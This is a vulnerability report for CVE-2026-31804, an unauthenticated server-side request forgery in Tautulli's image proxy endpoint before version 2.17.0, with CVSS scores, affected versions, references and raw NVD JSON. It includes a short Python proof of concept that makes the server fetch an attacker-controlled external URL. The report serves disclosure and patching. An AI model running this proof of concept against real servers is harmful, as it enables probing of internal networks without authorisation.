Security Vulnerability Report

CVE-2026-31804

Published: 2026-03-30 20:16:22
Last Modified: 2026-04-14 01:43:40

Description

Tautulli is a Python-based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the /pms_image_proxy endpoint accepts a user-supplied img parameter and forwards it to Plex Media Server's /photo/:/transcode transcoder without authentication and without restricting the scheme or host. The endpoint is intentionally excluded from all authentication checks in webstart.py, and any value of img beginning with http is passed directly to Plex. This causes the Plex Media Server process, which typically runs on the same host or internal network as Tautulli and has access to RFC-1918 address space, to issue an outbound HTTP request to any attacker-specified URL. This issue has been patched in version 2.17.0.

CVSS Details

CVSS Score: 4.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* - VULNERABLE
Tautulli < 2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC code for CVE-2026-31804
import requests

target_url = "http://localhost:8181"  # Replace with Tautulli URL

# Attacker controlled URL to verify outbound request (e.g., Burp Collaborator)
attacker_url = "http://burpcollaborator.net"

# Exploit endpoint
exploit_endpoint = f"{target_url}/pms_image_proxy"

# Payload
params = {"img": attacker_url}

try:
    # Send request without authentication
    response = requests.get(exploit_endpoint, params=params, timeout=10)
    print(f"Request sent to {exploit_endpoint} (HTTP {response.status_code})")
    print(f"Check {attacker_url} for DNS/HTTP interactions")
except Exception as e:
    print(f"Error: {e}")
```

References

https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0 (Release Notes)
https://github.com/Tautulli/Tautulli/security/advisories/GHSA-qj2f-4c4p-wv97 (Vendor Advisory, Exploit)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-31804", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:21.517", "lastModified": "2026-04-14T01:43:40.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the /pms_image_proxy endpoint accepts a user-supplied img parameter and forwards it to Plex Media Server's /photo/:/ transcode transcoder without authentication and without restricting the scheme or host. The endpoint is intentionally excluded from all authentication checks in webstart.py, any value of img beginning with http is passed directly to Plex, this causes the Plex Media Server process, which typically runs on the same host or internal network as Tautulli, with access to RFC-1918 address space, to issue an outbound HTTP request to any attacker-specified URL. This issue has been patched in version 2.17.0."}, {"lang": "es", "value": "Tautulli es una herramienta de monitoreo y seguimiento basada en Python para Plex Media Server. Antes de la versión 2.17.0, el endpoint /pms_image_proxy acepta un parámetro 'img' proporcionado por el usuario y lo reenvía al transcodificador /photo/:/ transcode de Plex Media Server sin autenticación y sin restringir el esquema o el host. El endpoint está intencionalmente excluido de todas las comprobaciones de autenticación en webstart.py, cualquier valor de 'img' que comience con HTTP se pasa directamente a Plex, esto hace que el proceso de Plex Media Server, que normalmente se ejecuta en el mismo host o red interna que Tautulli, con acceso al espacio de direcciones RFC-1918, emita una solicitud HTTP saliente a cualquier URL especificada por el atacante. Este problema ha sido parcheado en la versión 2.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17.0", "matchCriteriaId": "A0B5F451-819C-4ADA-BFFA-EDA898A7D082"}]}]}], "references": [{"url": "https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-qj2f-4c4p-wv97", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}
```